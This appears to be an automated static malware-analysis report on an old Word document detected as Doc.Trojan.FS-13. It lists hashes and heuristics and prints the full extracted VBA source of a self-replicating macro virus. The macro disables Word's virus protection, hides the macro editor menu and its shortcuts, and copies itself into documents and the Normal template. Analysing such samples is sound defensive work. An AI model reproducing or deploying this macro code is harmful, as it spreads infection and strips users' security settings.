Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9132cdfb08bb1eb2…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 1999-08-04 07:44:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 4a8b232484856c189f233dbb86147d6d
SHA-1: 8ea4d712c33d429e5fa004da96dce1a5882da0d6
SHA-256: 9132cdfb08bb1eb2f014be21e10c9bedf61587b3797fc58f77c380c6647af4b8
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros that attempt to disable security features and export the macro code itself to a file. The export path is constructed as Application.Path & ".SHS", which is a suspicious action. The ClamAV detection 'Doc.Trojan.FS-13' further supports the malicious nature of the file.

Heuristics 2

  • ClamAV: Doc.Trojan.FS-13 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.FS-13
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1235 bytes
SHA-256: 0f87878b60d5d4c9e2a9fd4a676ff32fe901a2486abfd033fbfbb539e27e8f7d
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Fancy"
'Copyright (C) 1998 by FlyShadow ~^^~ - Fancy
Sub DocClose()
Const ι = "Fancy": On Error Resume Next
Options.VirusProtection = &H0
Options.SaveNormalPrompt = &H0
Options.ConfirmConversions = &H0
Application.EnableCancelKey = &H0
If ActiveDocument.Path = "" Then GoTo 0
CommandBars("Tools").Controls(12).Visible = &H0
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=0, Command:=" "
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
If Dir(Application.Path & ".SHS") = "" Then ThisDocument.VBProject.VBComponents(ι).Export Application.Path & ".SHS"
If ActiveDocument.VBProject.VBComponents(ι).Name <> ι Then ActiveDocument.VBProject.VBComponents.Import Application.Path & ".SHS"
If NormalTemplate.VBProject.VBComponents(ι).Name <> ι Then NormalTemplate.VBProject.VBComponents.Import Application.Path & ".SHS"
0 ActiveDocument.Close: End Sub
Sub FileClose(): DocClose: End Sub